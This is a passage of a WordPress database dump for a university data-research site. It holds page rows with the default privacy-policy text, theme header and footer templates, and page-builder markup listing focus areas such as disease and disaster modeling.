the reset email.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>How long we retain your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>What rights you have over your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you have an account on this site, or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Where we send your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Visitor comments may be checked through an automated spam detection service.</p><!-- /wp:paragraph -->','Privacy Policy','','draft','closed','open','','privacy-policy','','','2022-02-14 21:44:32','2022-02-14 21:44:32','',0,'https://gsudice.dataconn.net/?page_id=3',0,'page','',0),(6,1,'2022-02-15 15:07:48','2022-02-15 15:07:48','{\"version\": 2, \"isGlobalStylesUserThemeJSON\": true }','Custom Styles','','publish','closed','closed','','wp-global-styles-bricksy','','','2022-02-15 15:07:48','2022-02-15 15:07:48','',0,'https://gsudice.dataconn.net/2022/02/15/wp-global-styles-bricksy/',0,'wp_global_styles','',0),(7,1,'2022-02-15 15:08:20','2022-02-15 15:08:20','','DICE log-6 sides-Largbox_text','','inherit','open','closed','','dice-log-6-sides-largbox_text','','','2022-02-15 15:08:20','2022-02-15 15:08:20','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/DICE-log-6-sides-Largbox_text.png',0,'attachment','image/png',0),(8,1,'2022-02-15 15:09:09','2022-02-15 15:09:09','<!-- wp:group {\"style\":{\"spacing\":{\"padding\":{\"top\":\"0rem\",\"right\":\"2px\",\"left\":\"2px\"}}},\"layout\":{\"inherit\":true}} -->\n<div class=\"wp-block-group\" style=\"padding-top:0rem;padding-right:2px;padding-left:2px\"><!-- wp:group {\"align\":\"wide\",\"style\":{\"spacing\":{\"padding\":{\"bottom\":\"calc(.5*var(\\u002d\\u002dwp\\u002d\\u002dcustom\\u002d\\u002dspacing\\u002d\\u002dsmall, 1.25rem))\",\"top\":\"calc(.5*var(\\u002d\\u002dwp\\u002d\\u002dcustom\\u002d\\u002dspacing\\u002d\\u002dsmall, 1.25rem))\",\"right\":\"2rem\",\"left\":\"2rem\"}}},\"layout\":{\"type\":\"flex\",\"justifyContent\":\"space-between\"}} -->\n<div class=\"wp-block-group alignwide\" style=\"padding-top:calc(.5*var(--wp--custom--spacing--small, 1.25rem));padding-right:2rem;padding-bottom:calc(.5*var(--wp--custom--spacing--small, 1.25rem));padding-left:2rem\"><!-- wp:group {\"layout\":{\"type\":\"flex\"}} -->\n<div class=\"wp-block-group\"><!-- wp:site-logo {\"width\":174.331125827815,\"shouldSyncIcon\":true} /--></div>\n<!-- /wp:group -->\n\n<!-- wp:navigation {\"layout\":{\"type\":\"flex\",\"setCascadingProperties\":true,\"justifyContent\":\"right\"}} /--></div>\n<!-- /wp:group --></div>\n<!-- /wp:group -->','Header','','publish','closed','closed','','header','','','2022-02-15 15:09:09','2022-02-15 15:09:09','',0,'https://gsudice.dataconn.net/2022/02/15/header/',0,'wp_template_part','',0),(9,1,'2022-02-15 15:09:09','2022-02-15 15:09:09','<!-- wp:group {\"align\":\"full\",\"style\":{\"spacing\":{\"padding\":{\"top\":\"3rem\",\"bottom\":\"8rem\",\"right\":\"3rem\",\"left\":\"3rem\"}}},\"layout\":{\"inherit\":true}} -->\n<div class=\"wp-block-group alignfull\" style=\"padding-top:3rem;padding-right:3rem;padding-bottom:8rem;padding-left:3rem\"><!-- wp:columns {\"align\":\"wide\"} -->\n<div class=\"wp-block-columns alignwide\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading {\"level\":4} -->\n<h4 id=\"about-us\">About Us</h4>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Etiam consequat sem ullamcorper, euismod metus sit amet, tristi justo. Vestibulum mattis, nisi ut.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>email:&nbsp;</strong><a href=\"#\">bricksy@example.com</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>phone:&nbsp;</strong><a href=\"#\">+1 265 013 7253</a></p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading {\"level\":4} -->\n<h4 id=\"our-adventures\">Our Adventures</h4>\n<!-- /wp:heading -->\n\n<!-- wp:columns {\"align\":\"wide\"} -->\n<div class=\"wp-block-columns alignwide\"><!-- wp:column {\"style\":{\"spacing\":{\"padding\":{\"top\":\"0rem\",\"right\":\"0rem\",\"bottom\":\"0rem\",\"left\":\"0rem\"}}}} -->\n<div class=\"wp-block-column\" style=\"padding-top:0rem;padding-right:0rem;padding-bottom:0rem;padding-left:0rem\"><!-- wp:image {\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://gsudice.dataconn.net/wp-content/themes/bricksy/assets/images/gallery-1.jpg\" alt=\"Nature Image\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://gsudice.dataconn.net/wp-content/themes/bricksy/assets/images/gallery-2.jpg\" alt=\"Nature Image\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {\"style\":{\"spacing\":{\"padding\":{\"top\":\"0rem\",\"right\":\"0rem\",\"bottom\":\"0rem\",\"left\":\"0rem\"}}}} -->\n<div class=\"wp-block-column\" style=\"padding-top:0rem;padding-right:0rem;padding-bottom:0rem;padding-left:0rem\"><!-- wp:image {\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://gsudice.dataconn.net/wp-content/themes/bricksy/assets/images/gallery-3.jpg\" alt=\"Nature Image\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":4348,\"linkDestination\":\"none\",\"className\":\"size-large\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://gsudice.dataconn.net/wp-content/themes/bricksy/assets/images/gallery-4.jpg\" alt=\"Nature Image\" class=\"wp-image-4348\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {\"style\":{\"spacing\":{\"padding\":{\"top\":\"0rem\",\"right\":\"0rem\",\"bottom\":\"0rem\",\"left\":\"0rem\"}}}} -->\n<div class=\"wp-block-column\" style=\"padding-top:0rem;padding-right:0rem;padding-bottom:0rem;padding-left:0rem\"><!-- wp:image {\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://gsudice.dataconn.net/wp-content/themes/bricksy/assets/images/gallery-5.jpg\" alt=\"Nature Image\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://gsudice.dataconn.net/wp-content/themes/bricksy/assets/images/gallery-6.jpg\" alt=\"Nature Image\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading {\"level\":4} -->\n<h4 id=\"categories\">Categories</h4>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li><a href=\"#\">Experience Thailand </a></li><li><a href=\"#\">Best Adventures</a></li><li><a href=\"#\"></a><a href=\"#\">Sea &amp; Beach </a></li><li><a href=\"#\">Hiking Tours</a><a href=\"#\"> </a></li><li><a href=\"#\">Kayaking Tours</a><a href=\"#\"> </a></li><li><a href=\"#\">Winter Destinations</a></li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:separator {\"align\":\"wide\",\"className\":\"is-style-wide\"} -->\n<hr class=\"wp-block-separator alignwide is-style-wide\"/>\n<!-- /wp:separator -->\n\n<!-- wp:spacer {\"height\":50} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:social-links {\"iconColor\":\"foreground\",\"iconColorValue\":\"#000000\",\"align\":\"center\",\"className\":\"has-icon-color is-style-logos-only\"} -->\n<ul class=\"wp-block-social-links aligncenter has-icon-color is-style-logos-only\"><!-- wp:social-link {\"url\":\"https://wordpress.org\",\"service\":\"wordpress\"} /-->\n\n<!-- wp:social-link {\"url\":\"twitter.com\",\"service\":\"twitter\"} /-->\n\n<!-- wp:social-link {\"url\":\"instagram.com\",\"service\":\"instagram\"} /--></ul>\n<!-- /wp:social-links -->\n\n<!-- wp:group {\"align\":\"wide\",\"style\":{\"spacing\":{\"padding\":{\"top\":\"4rem\",\"bottom\":\"4rem\"}}},\"layout\":{\"type\":\"flex\",\"justifyContent\":\"space-between\"}} -->\n<div class=\"wp-block-group alignwide\" style=\"padding-top:4rem;padding-bottom:4rem\"><!-- wp:site-title /-->\n\n<!-- wp:paragraph {\"align\":\"right\"} -->\n<p class=\"has-text-align-right\">Proudly powered by <a href=\"https://wordpress.org\" rel=\"nofollow\">WordPress</a></p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:group --></div>\n<!-- /wp:group -->','Footer','','publish','closed','closed','','footer','','','2022-02-15 15:09:09','2022-02-15 15:09:09','',0,'https://gsudice.dataconn.net/2022/02/15/footer/',0,'wp_template_part','',0),(18,1,'2022-02-15 15:45:11','2022-02-15 15:45:11','','header','','inherit','open','closed','','header-2','','','2022-02-15 15:45:11','2022-02-15 15:45:11','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/header.jpg',0,'attachment','image/jpeg',0),(20,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-335 style-local-20-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-336-outer style-local-20-c4-outer\">\n            <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-336 style-local-20-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-337-outer style-local-20-c5-outer\">\n            <div data-colibri-id=\"20-c5\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-337 style-local-20-c5 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"20-c6\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-331 style-local-20-c6 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-333-outer style-local-20-c7-outer\">\n            <div data-colibri-id=\"20-c7\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-333 style-local-20-c7 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c8\" class=\"h-global-transition-all h-heading style-334 style-local-20-c8 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-334 style-local-20-c8\">\n                    <!---->\n                    <!---->\n                    <h1 class=\"\">Focus Areas</h1>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"20-c9\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c10-outer\">\n            <div data-colibri-id=\"20-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c11\" class=\"h-icon style-274 style-local-20-c11 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c11-icon\"><!--Icon by Font Awesome (https://fontawesome.com)-->\n    <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\">\n      <path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path>\n    </svg></span></div>\n                <div data-colibri-id=\"20-c12\" class=\"h-global-transition-all h-heading style-275 style-local-20-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">disease &amp; disaster modeling</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"20-c13\" class=\"h-text h-text-component style-276 style-local-20-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c14-outer\">\n            <div data-colibri-id=\"20-c14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c14 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c15\" class=\"h-icon style-274 style-local-20-c15 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c15-icon\"><!--Icon by Font Awesome (https://fontawesome.com)-->\n    <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\">\n      <path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path>\n    </svg></span></div>\n                <div data-colibri-id=\"20-c16\" class=\"h-global-transition-all h-heading style-275 style-local-20-c16 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c16\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">data as a service</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"20-c17\" class=\"h-text h-text-component style-276 style-local-20-c17 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c18-outer\">\n            <div data-colibri-id=\"20-c18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c18 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c19\" class=\"h-icon style-274 style-local-20-c19 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c19-icon\"><!--Icon by Font Awesome (https://fontawesome.com)-->\n    <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\">\n      <path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path>\n    </svg></span></div>\n                <div data-colibri-id=\"20-c20\" class=\"h-global-transition-all h-heading style-275 style-local-20-c20 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c20\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Impact assessment</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"20-c21\" class=\"h-text h-text-component style-276 style-local-20-c21 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Front Page','','publish','closed','closed','','colibri-wp','','','2023-09-29 10:23:19','2023-09-29 14:23:19','',0,'https://gsudice.dataconn.net/colibri-wp/',0,'page','',0),(22,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n                <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n                <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n                          <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n                                    <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n                                          </a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div 